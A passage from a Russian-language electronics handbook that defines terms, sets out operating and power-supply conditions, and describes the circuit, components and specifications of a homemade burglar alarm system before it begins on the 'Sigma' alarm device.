Ремонтируемые сторожевые и сигнальные устройства — изделия, для которых проведение ремонтов предусмотрено в НТД и КД.
Ремонтопригодность свойство объема, заключающееся в приспособленности к предупреждению и обнаружению причин возникновения отказов, повреждений и восстановлению работоспособного состояния путем проведения технического обслуживания и ремонтов.
Отказ — событие (совокупность событий), заключающееся в нарушении работоспособного состояния устройства.
Система вторичного электропитания сторожевых и сигнальных устройств — средство вторичною электропитания этих устройств, обеспечивающее вторичным электропитанием по заданной программе все цепи комплекса.
Срок службы — календарная продолжительность от начала эксплуатации устройства или ее возобновления после ремонта определенного вида до перехода в предельное состояние.
Схема электрической цепи — графическое изображение электрической цепи, содержащее условное обозначение ее элементов и показывающее соединения этих элементов.
Стабилизатор напряжения вторичного электропитания сторожевых и сигнальных устройств — функциональный узел вторичного электропитания устройства, осуществляющий стабилизацию выходного напряжения без изменения рода напряжения (тока).
Ток включения — максимальное мгновенное значение входного тока при включении источника вторичного электропитания.
Функциональный узел сторожевого или сигнального устройства — устройство, входящее в состав схемы и выполняющее одну или несколько задач, обеспечивающих четкую работу всей системы охраны и сигнализации.
Химический источник тока — устройство, в котором химическая реакция заложенных в нем веществ непосредственно преобразуется в электрическую энергию при протекании электрохимических реакций.
Шифр — совокупность условных знаков для хранения и передачи информации в электронных устройствах.
Код — совокупность знаков и система определения правил, при помощи которых информация может быть
представлена (закодирована) в виде набора из таких символов для передачи, обработки и хранения (запоминания). Конечная последовательность кодовых знаков обозначается чаще всего цифрами и числами (0;1...66, 255 и т. д.).
Электрическая цепь — совокупность устройств и объектов образующих пун. для электрического тока, электромагнитные процессы в которых могут быть описаны с помощью понятий об электродвижущей силе, токе и напряжении.
Электрическое напряжение скалярная величина, равная линейному интегралу напряженности и электрического поля.
Электрическое соединение — соединение участков электрической цепи, при помощи которого образуется электрическая цепь.
Электрическое сопротивление постоянному току — скалярная величина, равная отношению постоянного напряжения на участке пассивной электрической цепи к постоянному току в нем при отсутствии на этом участке ЭДС.
Электродвижущая сила — скалярная величина, характеризующая способность стороннего поля и индуктированного электрического поля вызывать электрический ток.
Информационное резервирование — резервирование с применением резервов информации.
1. 4. УСЛОВИЯ ЭКСПЛУАТАЦИИ ЭЛЕКТРОННЫХ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ
Надежная, безотказная и долговечная эксплуатация ЭУОС обеспечивается многочисленными техническими требованиями, нормированными электрическими параметрами, нормами эксплуатации и их обязательным соблюдением как в ходе изготовления, так и в процессе работы. При создании УОС необходимо учитывать, что они работают, как правило, в жестких условиях температурных нагрузок и большого числа внешних воздействующих факторов. Неправильная оценка или незнание этих факторов, а также использование УОС с отступлением от номинальных режимов эксплуатации являются почти всегда основной причиной многих отказов и повреждении.
Как отмечалось ранее, все изделия электронной техники и электротехники, к которым прямо относятся УОС, а также большинство изделий радиотехники производственно-технического назначения и бытового потребления, изготавливаемых для нужд народного хозяйства страны и для поставки на экспорт, классифицируются по условиям применения, для них установлены нормы и требования по стойкости к внешним воздействующим факторам: механическим, климатическим, биологическим и электромагнитным.
Конструктивно-технологические исполнения УОС для различных климатических районов страны, категории исполнения, условия эксплуатации, хранения и транспортирования для всех видов приборов и других изделий народнохозяйственного, культурно-бытового назначения, хозяйственного обихода и общего назначения установлены государственными, межотраслевыми и отраслевыми стандартами.
Категории размещения сторожевых и сигнальных устройств, их обозначения, принятые в НТД, приводятся в табл. 1. 5.
При конструировании и эксплуатации УОС, являющихся совокупностью функциональных узлов, блоков и сложных комплектующих изделий и представляющих единую конструкцию, необходимо учитывать требования к устойчивости этих устройств при механических, биологических, климатических и электромагнитных воздействиях, а также требования к конструкции и электрическим параметрам. Производственно-технологические процессы создания новых устройств охраны по заданным или расчетным значениям электрических и конструктивных характеристик, механических и климатических воздействий всегда носят комплексный характер. Только такой подход к созданию и проектированию изделий позволяет принимать правильное решение, обеспечивающее получение желательного результата и оптимального съемно-технического решения.
УОС, изготавливаемые как самостоятельные сборочные единицы, создаются для эксплуатации в нескольких макроклиматических районах и всевозможных местах
Таблица 1. 5 Категории размещения сторожевых и сигнальных устройств
Окончание табл.1.5
Укрупненные основные категории |
Дополнительные категории |
||
Обозначение |
Область применения |
Обозначение |
Область применения |
овощехранилищ, подземных гаражей, подвалов, при отсутствии прямого воздействия атмосферных осадков. Для работы ЭКЗ и УОС в неотапливаемых и невентилируемых помещениях, в которых возможно длительное наличие воды или частая конденсация влаги на стенах и потолке, в частности в помещениях гидрометаллургических производств |
тегории 5, где исключается возможность конденсации влаги на комплектующих элементах |
размещения. Это диктуется в основном экономической и технической целесообразностью.
УОС бытового и общепромышленного назначения, проектируемые и выпускаемые промышленностью по категориям размещения (табл. 1. 6), классифицируют по группам эксплуатации. Некоторые виды этих устройств бытового назначения, изготавливаемые в исполнении УХЛ по категориям размещения и группам эксплуатации, даны в табл. 1. 6.
Если изделия и устройства изготавливаются промышленным способом, то обозначения видов климатического исполнения указывают в КД и ТД, а также на этикетке, на которой приводится марка изделия. В последнее время появилось много самодельных УОС, изготавливаемых, как правило, по эскизной документации в неприспособленных мастерских различных малых предприятий, кооперативов и акционерных обществ, которые не учитывают требования внешних воздействующих факторов, и в КД на эти изделия не даются сведения о климатическом исполнении. В общем виде обозначение видов климатического исполнения охранных устройств должно включать либо сочетание исполнения и категории, отражающее наиболее жесткие условия эксплуатации, либо несколько исполнений и категорий, для которых предназначены эти изделия.
Важную роль при эксплуатации УОС и их функциональных узлов играют температура окружающей среды
Таблица 1.6 Группы сторожевых и сигнальных устройств
и значение относительной влажности воздуха при этой температуре. Нормальные и предельные рабочие температуры окружающей среды при эксплуатации изделий электронной техники и значения относительной влажности приведены в табл. 1.7. и 1.8.
Таблица 1.7. Температура воздуха при эксплуатации сторожевых и сигнальных устройств
Окончание табл. 1. 7
Таблица 1.8. Относительная влажность воздуха при эксплуатации сторожевых и сигнальных устройств.
1. 5. ЭЛЕКТРОПИТАНИЕ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ
Электронные, электрические и электронно-механические изделия и устройства, составляющие большую и особую группу, к которым относятся УОС, должны отвечать определенным и строго установленным требованиям по питающему напряжению, действующей частоте переменного тока, стабилизированному току и другим параметрам. Учитывая многообразие УОС и различные условия эксплуатации, к электропитанию предъявляются повышенные требования, которые должны отвечать установленным требованиям государственных стандартов.
Для электропитания УОС в большинстве случаев применяются первичные и вторичные источники. В качестве источников первичного электропитания для УОС используются сети переменного тока напряжением 200 В частотой 50 Гц и чрезвычайно редко — напряжением 127 В. Также в качестве первичных источников применяются ХИТ: одноразовые автономные гальванические элементы типа 373, 343, 316, А373 и другие, батареи и аккумуляторы различных систем, преобразователи внутренней химической или биологической энергии вещества в электричество, термо- и фотоэлектрические преобразователи энергии, акустические, топливные, атомные и другие типы преобразователей.
В качестве вторичных источников электропитания УОС используются узлы и БП, которые работают, как правило, от первичных сетей и подключаются к ним, преобразуя их переменное или постоянное напряжение в ряд выходных напряжений различных номиналов как постоянного, так и переменного тока.
В настоящее время выпускается большое количество самых разных типов и видов первичных и вторичных источников питания, которые могут быть использованы для электропитания УОС.
Как известно, к первичным сетям электропитания относятся системы и сети, объединенные общим процессом генерирования и (или) преобразования, передачи и распределения электрической энергии и состоящие из источников и (или) преобразователей электрической энергии, электрических сетей распределительных устройств, а также устройств, обеспечивающих поддержание ее параметров в заданных пределах. Постоянное или переменное напряжение, действующее на входе электронных устройств, определяется как номинальное напряжение питания УОС.
Номинальные значения и допускаемые отклонения постоянных и переменных напряжений питания для установленных частот определены параметрическими рядами, которые распространяются как на системы электроснабжения, сети, источники, преобразователи, так и непосредственно на присоединяемые к ним приемники электрической энергии. Номинальные напряжения систем электроснабжения, источников, преобразователей, сетей и приемников приведены в табл. 1. 9. В качестве приемников электроэнергии в данном случае выступают УОС.
Таблица 1. 9. Номинальные значения напряжений питающей сети, преобразователей и приемников электрической энергии
Параметрические ряды номинальных значений токов, используемых в источниках и приемниках электрической энергии, в том числе в УОС, указаны в табл. 1. 10. Параметрические ряды номинальных частот и их допускаемые отклонения для систем электроснабжения, приемников и преобразователей электрической энергии в случае использования нетрадиционных источников переменного тока приведены в табл. 1. 11.
Таблица 1. 10. Параметрические ряды номинальных значений токов, используемых в приемниках электрической энергии
Таблица 1.11. Параметрические ряды номинальных частот и их допускаемые отклонения
Важным моментом при выборе конкретных значений номинальных напряжения и тока для УОС является правильная оценка их принципиальных электрических схем, а также схем электрооборудования ИМ и технологических процессов; цепи, замкнутые внутри изделий, в которых токи питания и напряжения определяются схемными и инженерно-техническими решениями и не вписываются в параметрические ряды, указанные в табл. 1. 10—1. 12. К ним относятся принципиальные схемы УОС с переходными процессами, токи которых определяются суммарными токами приемников электрической энергии, и их значения не могут быть обеспечены данными, приведенными в табл. 1. 10. и 1. 11. Это же положение относится к электрическим цепям, замкнутым внутри электронных схем ИМ, электрических машин, аппаратов и подобных им изделий и устройств; элементам тепловых реле; цепям приемопередающей, Сигнальной-вызывной аппаратуры, цепям измерения и контроля, сигнализации и управления; катушкам обмоток электрических аппаратов. Для УОС, а также других приемников электрической энергии, для которых предусмотрено несколько режимов работы, номинальные токи, указанные в табл. 1. 11, относятся к нормальному и установившемуся режимам работы, для остальных режимов работы
эти токи являются рекомендуемыми. Из перечисленных в табл. 1. 11 номинальных значений токов предпочтительными являются следующие: 1; 1,6;2,5;4;6,3А, а также десятинные и дольные значения этих токов.
При конструировании или применении готовых устройств электропитания для ЭУОС, отличающихся от рассматриваемых в настоящем справочнике, номинальные напряжения выбираются в основном из табл. 1. 12. В некоторых случаях, обусловленных требованиями эксплуатации УОС, используются номинальные напряжения, отличные от указанных в Табл. 1. 12. Предпочтительными номинальными напряжениями постоянного тока считаются напряжения 36 или 60 В. На входе УОС в жилых помещениях применяются однофазные переменные и фазовые напряжения трехфазного тока. Номинальное значение переменного напряжения равно 220 В. Рабочее напряжение при питании УОС от электросети общего назначения может изменяться в очень широких пределах, особенно в сельской местности,—от 150 до 280 В, а при питании радиоэлектронных изделий и электротехнической аппаратуры от электросети общего назначения через устройства регулирования — от 200 до 235 В.
Номинальное значение частоты питающей сети переменного тока, которое применяется в нашей стране, равно 50 Гц, а в США — 60 Гц. Изменения частоты питающей сети, при которых аппаратура и электронные изделия работают достаточно устойчиво, находятся в пределах от 49 до 51 Гц. Коэффициент нелинейных искажений питающей сети переменного тока лежит в пределах от 10 до 12%.
Таблица 1. 12 Параметрические ряды номинальных напряжений для питания электронных кодовых замков и УОС
Глава вторая. Сторожевые устройства и охранная сигнализация
2. 2 ЭЛЕКТРОННОЕ УСТРОЙСТВО ОХРАННОЙ СИГНАЛИЗАЦИИ
Рассматриваемое устройство представляет собой ЭСОС, предназначенную для охраны жилых, производственных и хозяйственных помещений, автомобилей, мотоциклов, катеров, сейфов и других ценных объектов и предметов циклического пользования.
Устройство может быть установлено в квартирах жилых домов, производственных зданиях малых предприятий, кооперативах и акционерных обществах, хозяйственных постройках на садово-огородных участках, гаражах и т. д.
ЭСОС создана как комплексное электронно-техническое устройство, обеспечивающее автоматическое срабатывание сигнальных цепей и блоков при несанкционированном вторжении в охраняемый объект и при нарушении звеньев системы охраны. Относительная простота и надежность работы СОС делают ее доступной для повторения в радиолюбительских мастерских и кружках юных техников.
Принципиальная электрическая схема комбинированной ЭСОС приведена на рис. 2. 1. Как следует из принципиальной схемы, ЭУОС состоит из следующих функциональных блоков и узлов: входных цепей, сетевого понижающего трансформатора питания 77, выпрямителя, автономного источника питания GB1, СНПТ, электронного блока управления, выходных цепей, сигнализатора и индикатора. В качестве автономного источника питания может быть использована аккумуляторная батарея GB1 любого типа, обеспечивающая на выходе напряжение 12 В. Входное устройство обеспечивает подключение ЭСОС к сети переменного тока напряжением 220 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка» и стандартной штепсельной розетки. Плавкий предохранитель F1, установленный на входе устройства, защищает его от коротких замыканий, которые возможны при неправильном монтаже, ошибках при сборке и из-за неисправных комплектующих ЭРЭ. Включение и выключение питания обеспечивается однополюсным переключателем S1, при замыкании контактов которого переменное напряжение подается на первичную обмотку трансформатора Т1. При включении устройства в сеть загорается индикаторная неоновая лампа H1, которую устанавливают на видном месте охраняемого объекта.
Блок выпрямительного устройства включает в свой состав сетевой понижающий трансформатор питания T1 и собственно выпрямитель, собранный по однофазной двухполупериодной мостовой схеме Греца на четырех выпрямительных диодах VD1 — VD4. Примененное выпрямительное устройство характеризуется достаточно полным использованием габаритной мощности сетевого трансформатора, повышенной частотой пульсации выпрямленного напряжения постоянного тока, повышенным кпд устройства, низким обратным напряжением на комплекте выпрямительных диодов, повышенным сроком эксплуатации, но несколько большей стоимостью изготовления. Диоды выпрямителя должны быть установлены на гетинаксовой плате с распайкой катодов и анодов по схеме, их нельзя установить на общей металлической пластине вместе с сетевым трансформатором без прокладок. Повышенный расход выпрямительных диодов, по сравнению с другими выпрямительными схемами, компенсируется высокой надежностью и долговечностью работы устройства.
Сетевой понижающий трансформатор питания 77 изготавливается на броневом магнитопроводе типа Ш, имеет одну катушку, которая устанавливается на центральном стержне магнитопровода, имеющем активную площадь поперечного сечения стали не менее 7 см2. Кроме основной функции сетевой трансформатор обеспечивает гальваническую развязку вторичных цепей устройства от сети переменного тока высокого напряжения и дополнительную электробезопасность при эксплуатации ЭСОС. При изготовлении сетевого трансформатора в домашних условиях необходимо обратить особое внимание на изоляцию обмоточных проводов между слоями и между обмотками, а также обязательную пропитку трансформатора изоляционными лаками. Магнитопровод трансформатора изготавливается методом шихтовки из пластин трансформаторной стали толщиной 0, 25... 0, 5 мм.
Первичная обмотка трансформатора рассчитана на подключение к сети переменного тока напряжением 220 В и выдерживает максимальную токовую нагрузку до 3 А. На вторичной обмотке трансформатора действует напряжение переменного тока равное 32, 5 В в режиме холостого хода.
Напряжение постоянного тока, снимаемое с полупроводникового выпрямителя, подается на источник стабилизированного напряжения, который представляет собой регулируемый компенсационный стабилизатор последовательного действия. Его выходное напряжение можно плавно регулировать в пределах 5... 30 В при токе нагрузки до 1 А. СИП включает в свой состав РЭ, собранный на тиристоре VD6 (VS1), работающем в ключевом режиме, благодаря чему потери мощности в стабилизаторе очень малы и рассеиваемая тепловая энергия незначительна. Тиристор управляется импульсами, вырабатываемыми релаксационным генератором, собранным на аналоге однопереходного составного транзистора VT2, VT3. Напряжение на выходе стабилизатора определяется разностью фаз импульсов управляющего генератора и полуволн выпрямленного напряжения. Эта разность напряжений зависит от зарядного тока конденсатора С3, который включен в коллекторную цепь транзистора VT1, выполняющего функцию регулятора постоянного тока. На базу транзистора с движка подстроечного резистора R3 поступает часть напряжения со стабилитрона VD5, а на эмиттер — часть выходного напряжения, снимаемого с делителя R9, R10. Подстроечным резистором R3 устанавливается требуемое напряжение питания в пределах от 5 до 30 В.
При уменьшении значения выходного напряжения стабилизатора относительно установленного уровня напряжение на резисторе R9 также уменьшается, а на эмиттерном переходе транзистора VT1 увеличивается открывающее напряжение. В результате его коллекторный ток увеличивается, а конденсатор СЗ начинает заряжаться быстрее. Это приводит к более раннему открыванию тринистора VD6 (VSI), поэтому напряжение на выходе стабилизатора возрастает до прежнего значения. Если же выходное напряжение увеличивается, процесс восстановления заданного уровня напряжения протекает в обратном направлении. Напряжение, снимаемое с транс форматора, обеспечивается коэффициентом трансформации и моточными данными, которые приведены и табл. 2. 3.
Электронный управляющий блок ЭСОС является основным устройством, которое представляет собой обычную триггерную схему, собранную на двух ИМС DAI и DA2, пяти транзисторах и шести выпрямительных диодах. В принципиальной схеме управляющего блока ЭСОС собрано устройство против ложных срабатываний. Сигнальная цепь как главная часть электронной системы представляет собой определенный набор микропереключателей и электрических датчиков, которые устанавливаются замаскированно на окнах, дверях, замках, задвижках, переключателях, калитках и т. п.
В составе электронного управляющего блока собрано два таймера, обеспечивающих задержку срабатывания охранной системы после размыкания любого микропереключателя и электрического датчика. Первый таймер обеспечивает короткую временную задержку срабатывания ЭСОС, которая достаточна для установления системы в исходное положение, то есть до того, как она будет приведена в действие, когда владелец войдет в охраняемый объект или помещение, разомкнув один из микропереключателей, например на входной двери. Второй таймер настраивается на определенно заданное время работы звукового или светового сигнализаторов. Принципиальная схема предусматривает возможность устанавливать время работы сигнальной системы от 0 до 5 мин после срабатывания. По истечении заданного времени работы система автоматически отключается и устанавливается в исходное положение независимо от того, замкнута или разомкнута сигнальная цепь устройства. Первый таймер можно настроить на задержку времени срабатывания до 30... 35 с.
Работоспособность сигнальной системы восстанавливается в любой момент рабочего цикла специальной кнопкой переключателя S2 типа П2К. При замкнутой сигнальной цепи во включенном состоянии постоянно течет ток, обеспечивающий запуск управляющего устройства. В это время таймеры отключены и не работают. При размыкании сигнальной цепи открывается транзи-
Т а б л и ц а 2. 3. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охранной сигнализации
стор VT10 на время, устанавливаемое зарядкой конденсатора С8 и сопротивлением резистора R27, в результате чего конденсатор С7 разряжается и первый таймер приводится в действие. Резистор R1 и конденсатор С1 предотвращают срабатывание первого таймера от случайных сигналов, возникающих в сигнальной цепи. В случае многократного размыкания и замыкания контактов микропереключателей в сигнальной цепи первый таймер, не завершив свой цикл, не даст команды на включение второго таймера. Для устранения этого недостатка первая ИМС соединена со второй. После того как первый таймер завершит свой цикл, открывается транзистор VT2 и начинает заряжаться конденсатор С10, запускающий второй таймер.
Обе ИМС DA1 и DA2 питаются постоянным стабилизированным напряжением, не превышающим 12... 15 В. Для получения этого напряжения применен биполярный транзистор VT9, который совместно со стабилитроном VD11 и резистором R15 обеспечивает заданное значение напряжения. В схеме использованы транзисторы VT7 и VT8, преобразующие напряжение выходного сигнала второго таймера до значения напряжения на выходе компенсационного стабилизатора. А транзисторы VT4 и VT5 обеспечивают усиление мощности, достаточное для срабатывания электромагнитного реле.
В данной ЭСОС используются широко применяемые комплектующие ЭРИ, которые имеются в продаже. Комплектующие ЭРЭ собираются на печатной плате, изготавливаемой из фольгированного гетинакса или стеклотекстолита толщиной до 2 мм. Печатная плата, сетевой трансформатор питания Т1 и аккумуляторная батарея располагаются на шасси из дюралюминия и закрепляются в пластмассовом или металлическом корпусе, имеющем крышку и лицевую панель.
При создании сторожевого устройства применены следующие комплектующие ЭРЭ и ЭРИ: сетевой понижающий трансформатор питании Т1 типа Ш броневой конструкции; ИМС DA1 типа К561ЛА7, DA2 типа К561ЛА7; транзисторы VTI типа МП 114, VT2 — МП114, VT3 - КТ315Г, VT4 — КТ933Б VT5-КТ3102Д, VT6 — КТ3102Д, VT7 — КТ3107Б, VT8 — КТ3102Д VT9 — КТ3102Д, VT10 — КТ3102Д; выпрямительные диоды VD1 — VD4 типа КД202Б, VD7 — КД521А, VD8 — КД521А VD9 - КД223, VD12 - VD15 типа КД521А; тиристор VD6 (VS1) типа КУ201Г; стабилитроны VD5 типа Д814В, VD11— Д814А; светодиод VD10 (HL1) типа АЛ307Б; конденсаторы С1 типа K50-16-16U-22 мкф, С2 — К50-3-50В-10 мкФ, СЗ — К40У-9-0,33 мкФ, С4 — К50-3-50В-2000 мкФ, С5 — К10-7В-50В-1 мкФ С6 — К10-17-40В-Н90-1 мкФ, С7 — К10-17-40В-Н90-1 мкФ С8 — К10-17-40В-Н90-0.1 мкФ, С9 — КМ-6-25В-НЗО-0 1 мкФ С10 — КМ-6-25В-Н90-1 мкФ, СИ — К50-3-25В-10 мкФ; резисторы R1 типа ВСа-0,5-5,6 кОм, R2 — ВСа-0,5-2 кОм, R3 — переменный типа СП3-1б-0,25Вт-6,8 кОм, R4 — ВСа-2-6,2 кОм R5 — ВСа-0,5-6,2 кОм, R6 — ВСа-0,25-10 кОм, R7 — ВСа-025-10 кОм, R8 - ВСа-0,25-10 кОм, R9 — ВСа-0,25-1,5 кОм R10 — ВСа-0,25-4,7 кОм, R11 — ВСа-0,25-1,8 кОм, R12 — ВСа-025-10 кОм, R13 — ВСа-0,25-22 кОм, R14 — ВСа-1-22 кОм R15 — ВСа-0,25-2,2 кОм, R16 - ВСа-0,25-22 кОм, R17 — ВСа-025 10 МОм, R18 — ВСа-0,25-10 МОм, R19 — ВСа-0,25-330 кОм R20 — ВСа-0,25-330 кОм, R21 — ВСа-0,25-2,2 МОм, R22 — ВСа-0,25-10 кОм, R23 — ВСа-0,25-1 МОм, R24 — ВСа-0,25-10 кОм R25 — ВСа-0,25-10 кОм, R26 — ВСа-1-22 кОм, R27 — ВСа-2-10 кОм, R28 — ВСа-2-280 кОм; реле электромагнитное К1 типа РЭС-10; предохранитель плавкий F1 типа ПМ-1-0,5 А; индикаторная лампа Н1 типа ТН-0,2-1; переключатели S1 типа П1Т-1-1, S2 — KПI-1, S3 — Sn типа МП-7; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной 1,5 м; Х2, ХЗ — КМЗ-1; громкоговоритель(сирена) ВА1 типа 0,5 ГД1.
При монтаже, регулировке, настройке и ремонте сторожевого устройства могут быть применены другие комплектующие ЭРЭ, не ухудшающие основные электрические параметры и эксплуатационные характеристики ЭСОС. Например, сетевой понижающий трансформатор питания Т1 может быть заменен трансформатором унифицированной конструкции типов ТА, ТН, ТАН, ТПП, ТС, ТТ; резисторы типа ВСа могут быть заменены резисторами типов МЛТ, ОМЛТ, C1-4, С2-8, МТ, УЛИ. Замена ППП может быть произведена в соответствии с рекомендациями, изложенными выше. В качестве оксидных или электролитических конденсаторов могут быть применены конденсаторы типов К50-3, К50-12, К50-16, К50-20.
Нормированные значения климатических и механических внешних воздействующих факторов, условия эксплуатации данного электронного устройства и его основные электрические параметры рассмотрены ниже.
Здесь необходимо сказать об установке ИМС на платы, лужение выводов и пайка которых производятся с учетом конструктивных особенностей корпусов ИМС.
При установке примененных в сторожевом устройстве ИМС необходимо принять все меры предосторожности, которые должны сводиться к тому, чтобы защитить корпус ИМС от недопустимых деформаций. Чаще всего это. достигается правильной распайкой выводов на заранее подготовленные контактные площадки. Размещение корпусов на печатной плате должно обеспечивать возможность свободного доступа для ее демонтажа.
Специальные требования предъявляются к правильному выбору режимов пайки выводов, которые изложены в табл. 2. 4. Качество паяных соединений ИМС не зависит от количества припоя и флюса, скорее наоборот: излишки припоя могут скрыть дефекты соединения, а обилие канифоли или флюса приводит к загрязнению места пайки.
Надежное и правильно выполненное паяное соединение характеризуется следующими признаками, которые определяются визуально: паяная поверхность должна быть светлой блестящей или светло-матовой, без темных пятен и посторонних включений, форма паяных соединений должна иметь вогнутые галтели припоя. Через припой должны проявляться контуры входящих в соединение выводов элементов и проводников. Работа с ИМС кроме всего требует специальных мер защиты от повреждений статическим электричеством.
Таблица 2. 4. Режимы пайки выводов микросхем
ЭУОС работает в полуавтоматическом режиме следующим образом. При включенном ЭУОС в сеть переменного тока при наличии автономного источника питания и при замкнутых контактах переключателей S1 и S1.1 оно находится в режиме ожидания. При этом все последовательно соединенные контакты переключателей S3... Sn замкнуты. В это время на выходе ИМС DA2 действует высокий уровень — состояние логической единицы, такой же высокий уровень действует на обоих входах ИМС DA1.
При размыкании одного из контактов переключателей S3... Sn вход ИМС DA 1 (вывод 13) переходит в состояние низкого уровня логического нуля, а выход этой ИМС (вывод 12} — в состояние высокого уровня логической единицы. Включенные в цепь резистор R1 и конденсатор С1 защищают управляющее устройство от электромагнитных наводок, которые могут возникнуть в сигнальных цепях. В то время, когда вход ИМС DA1 (вывод 13) находится в состоянии низкого уровня логического нуля, а выход (вывод 12) — в состоянии высокого уровня логической единицы, открывается транзистор VT10, в результате чего конденсатор С7 разряжается и первый таймер приходит в действие.
Важно заметить, что таймером называется прибор (устройство), который по истечении заданного промежутка времени может автоматически включать (выключать) ИМ. Время открывания транзистора VT10 определяется емкостью конденсатора С8, а также сопротивлением резистора R27. Для запуска второго таймера вход первой ИМС DA I (вывод 14) подключен к выходу второй ИМС DA2 (вывод 12). Этот выход (вывод 12} находится в состоянии низкого уровня логического нуля до тех нор, пока работает первый таймер. После срабатывания первого таймера выход ИМС DA2 (вывод 12) переходит в состояние высокого уровня логической единицы, транзистор VT6 открывается, конденсатор С10 заряжается и запускается второй таймер. Для установления обоих таймеров в исходное состояние в ЭУОС установлен переключатель S2, нажатие на кнопку которого и замыкание контактов 1 и 2 приводят к быстрой разрядке конденсаторов С7 и С10 через диоды VD7 и VD8.
Электронное устройство работает от источника постоянного тока напряжением до 25 В. Однако ИМС могут работать при напряжении не более 15 В, а оптимальным напряжением в данном случае выбрано напряжение 7, 5 В. При выборе исполнительного устройства — сигнальной сирены — необходимо учитывать, что на него подается напряжение постоянного тока также 25 В.
Преобразование повышенного напряжения питания до значения 7, 5 В осуществляется с помощью включенных в схему транзистора VT9, стабилитрона VD11 и резистора R15, а также транзисторов VT7 и VT8. Четыре биполярных транзистора VT4 и VT5, VT7 и VT8 обеспечивают соответственно усиление по мощности, необходимое для срабатывания электромагнитного реле К1 и исполнительных устройств, они обеспечивают преобразование выходного сигнала второго таймера с 7, 5 В до значения напряжения источника питания исполнительных механизмов.
Параллельно сетевому источнику питания, работающему от выпрямителя на диодах VD1 — VD4, в схему включен автономный источник электропитания (ХИТ), напряжение которого находится в пределах 12... 20 В. Действует автономный источник питания при отключении электропитания от сети переменного тока, а также при разомкнутых контактах переключателя S1 так, как показано на схеме. Контакты переключателя S1. 1 при этом должны быть замкнуты. Электропитание ЭУОС от автономного источника питания GB1 осуществляется через выпрямительный диод VD16, который закрыт в одном направлении до тех пор, пока напряжение на выпрямителе выше напряжения батареи аккумуляторов. Поэтому оптимальным напряжением электропитания считается напряжение 15 В.
Регулировку ЭУОС начинают с проверки напряжения на вторичных обмотках сетевого понижающего трансформатора Т1, далее — на выходе выпрямителя Греца и на выходе стабилизатора компенсационного типа. Проверка ЭУОС в целом не представляет особой сложности. Необходимо проверить наличие напряжения на конденсаторе С4. Если напряжение на конденсаторе отсутствует, то надо проверить работоспособность стабилитрона VD11. Электромагнитное реле К1 позволяет запускать электронную схему и подавать напряжение на сирену ВА1 без перенапряжения конденсатора С4, не увеличивая его номинальную емкость. Напряжение на светоизлучающий диод подается через регулирующий переменный резистор R11.
Основные электрические параметры и технические характеристики электронного устройства охранной сигнализации
Номинальное напряжение питающей сети
переменного тока, В.................... 220
Номинальная частота питающей сети переменного тока, Гц......................... 50
Номинальное напряжение питания постоянного
тока от автономного источника, В........... 12... 15
Пределы изменения напряжения питающей сети
переменного тока, В.................... 187... 242
Пределы изменения частоты питающей сети переменного тока, %, не более.............. + _1
Пределы регулирования выходного стабилизированного напряжения, В................. 5... 30
Мощность СИП, Вт, не менее............... 50
Мощность, потребляемая устройством в режиме
холостого хода, Вт, не более............... 5
Коэффициент стабилизации напряжения постоянною тока, не менее..................... 150
Коэффициент нелинейных искажений питающей
сети переменного тока, %, не более......... 10
Количество одновременно охраняемых помещений
и объектов, шт........................ 1... 20
Готовность устройства к эксплуатации после
включения в рабочий режим, с............. 0, 5
Время срабатывания ЭУОС после размыкания контактов одного из переключателей охранной цепи, мс, не более....................3
вероятность безотказной работы устройства при риске заказчика в=0, 93............. 0, 97
Срок службы устройства, ч, не менее...... 5000
Электрическая прочность изоляции токоведущих цепей при нормальных климатических условиях эксплуатации, В, не менее................ 500
Электрическое сопротивление изоляции токоведущих частей между собой и металлическим корпусом, МОм, не менее................ 10
Помехозащищенность устройства при напряженности внешнего электромагнитного поля, дБ, не менее............................ 80 кпд, %, не менее........................ 70
Рис. 2.1. Принципиальная схема комбинированной электронной системы охранной сигнализации.
2. 3. УСТРОЙСТВО СИГНАЛИЗАЦИИ ТИПА «СИГМА»
Это электронное УС широко используется в виде БЭ в различных промышленных охранных устройствах, рекламируемых разными фирмами и акционерными обществами. Как правило, в охранных и предупредительных устройствах, устанавливаемых на объектах, этот БЭ не раскрывается и не сопровождается принципиальной электрической схемой. А отсутствие информации о применяемых комплектующих ЭРЭ не позволяет владельцам охранных устройств устранять неполадки в схеме своими силами.
Электронное УС типа «Сигма», работающее по принципу включения на замыкание контактов конечных выключателей, предназначено для охраны жилых и производственных помещений, хозяйственных построек на садово-огородных участках, а также автомобилей, мотоциклов, катеров и т. п. Срабатывает устройство при несанкционированном открывании дверей, окон, форточек, крышек, капотов и т. п., замыкая контакты переключателей. Работает УС или от сети переменного тока напряжением 220 В частотой 50 Гц, или от аккумуляторной батареи напряжением от 9 до 12 В постоянного тока. Аккумуляторная батарея отключается при эксплуатации УС от сети переменного тока. При установке УС в автомобиле, катере или яхте электропитание осуществляется от бортовой сети.
Принципиальная электрическая схема УС со звуковой сигнализацией типа «Сигма» приведена на рис. 2. 2. УС включает в свой состав цепи входного устройства, сетевой понижающий трансформатор питания Т1, выпрямительное устройство с емкостным фильтром, стабилизатор напряжения компенсационного тина, сигнальную систему управления со схемой электронной сирены.
Входное устройство УС. обеспечивает подключение к сети переменного тока напряжением 220 В, защиту исходных цепей от коротких замыканий и перегрузок, которые могут возникнуть при ошибках в монтаже или из-за неисправных комплектующих элементов, сигнализацию о готовности УС к эксплуатации и подключение аварийного питания от аккумуляторной батареи GBI с контролем тока нагрузки, включение и выключение электропитания УС осуществляется с помощью двух переключателей S1 (от автономного источника питания) и S2 (от сети переменного тока).
В устройстве применен сетевой понижающий трансформатор питания Т1, который изготавливается на унифицированном магнитопроводе типа УШ броневой конструкции и имеет одну катушку, устанавливаемую на центральном стержне. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4 см2.
